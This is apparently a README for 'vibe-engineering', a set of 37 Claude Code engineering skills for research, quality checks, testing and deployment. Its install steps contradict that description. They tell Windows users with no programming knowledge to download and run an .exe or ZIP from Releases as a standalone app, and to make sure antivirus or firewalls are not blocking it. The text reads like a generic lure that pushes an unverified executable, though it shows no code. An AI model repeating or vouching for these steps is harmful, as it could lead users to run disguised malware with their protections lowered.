vibe-engineering offers 37 practical engineering skills to improve your work with Claude Code. These skills cover research, quality checks, testing, deployment, gap analysis, and more. This tool helps you apply real-world software engineering methods with ease.
vibe-engineering is a set of skills focused on improving how you handle engineering tasks in Claude Code. If you work with code tools and want to boost code quality, test your work effectively, or deploy projects smoothly, this set of skills can guide you. The skills come from actual experience rather than theory, so they fit everyday problems developers face.
You do not need to know programming to use vibe-engineering. The steps will guide you to download, install, and run the application on a Windows computer.
Click the big green button at the top or use this link:
Download vibe-engineering from GitHub
This link takes you to the GitHub page where you can find files to download and instructions to get started.
Before you download vibe-engineering, make sure your system meets these requirements:
- Windows 10 or later (64-bit recommended)
- Minimum 4 GB of RAM
- At least 200 MB of free disk space
- Internet connection to download files and updates
- A standard mouse and keyboard
If your computer matches these requirements, you can proceed to download and install the application.
Follow these steps to get vibe-engineering up and running on your Windows machine.
Go to the vibe-engineering GitHub page. Here, you will find all files related to the project and instructions for usage.
Look for the Releases section on the page. This is where the latest stable version of vibe-engineering lives. Click on it to see the available files.
Depending on the release, you will see one or more download options:
- Look for a file ending with
.exeif available. This is an installer you can run directly. - If there is a ZIP file, download it, and you will need to extract the contents.
Click the download link next to the file you want and save it to an easy location, like your Desktop or Downloads folder.
- If you downloaded an
.exefile, double-click it to start installation. Follow the on-screen prompts. You can keep the default options. - If you downloaded a ZIP file, right-click it and choose Extract All. Pick a folder on your computer where you can find the files later.
Once installed or extracted, locate the program in your Start menu or folder and double-click it to open.
Once the application launches, you will see a simple interface. It groups 37 engineering skills that address different tasks you may face.
Here are some key areas you can explore:
- Research: Collect information and best practices for engineering problems.
- Quality Gates: Steps to check code quality before moving forward.
- Testing: Methods and tools to test software functionality.
- Deployment: Instructions to safely release your software.
- Gap Analysis: Identify missing parts in your projects.
- More Skills: Various guides to improve daily engineering tasks.
Each skill appears as a clear option or checklist. Click on any to learn and apply it.
If you run into problems, try these tips:
- Make sure you downloaded the correct file for your system (Windows 64-bit).
- Confirm that no antivirus or firewall is blocking the installation or app execution.
- Close unnecessary apps to free system resources.
- Restart your computer and try opening the app again.
You can revisit the GitHub page for updated releases or help files.
Check back on the GitHub releases page regularly. When a new version is available:
- Download the latest
.exeor ZIP file. - Follow the same installation or extraction steps.
- Usually, new versions keep your previous settings or data, but it is good practice to back up any important files before updating.
The GitHub page includes extra documents to help you understand and get the most out of vibe-engineering:
- A user manual explaining all 37 skills.
- Example workflows showing how to apply certain skills.
- FAQs to answer common questions.
Use these whenever you want detailed explanations.
Repository Name: vibe-engineering
Focus: Engineering skills for Claude Code, covering research, quality, testing, deployment, and gap analysis. Real-world experience based.
Topics: ai-agents, ai-coding, anthropic, best-practices, claude, claude-code, claude-code-plugin, code-quality, developer-experience, developer-tools, engineering, multi-agent, plugin, quality, skills, software-engineering, tdd, testing, vibe-coding.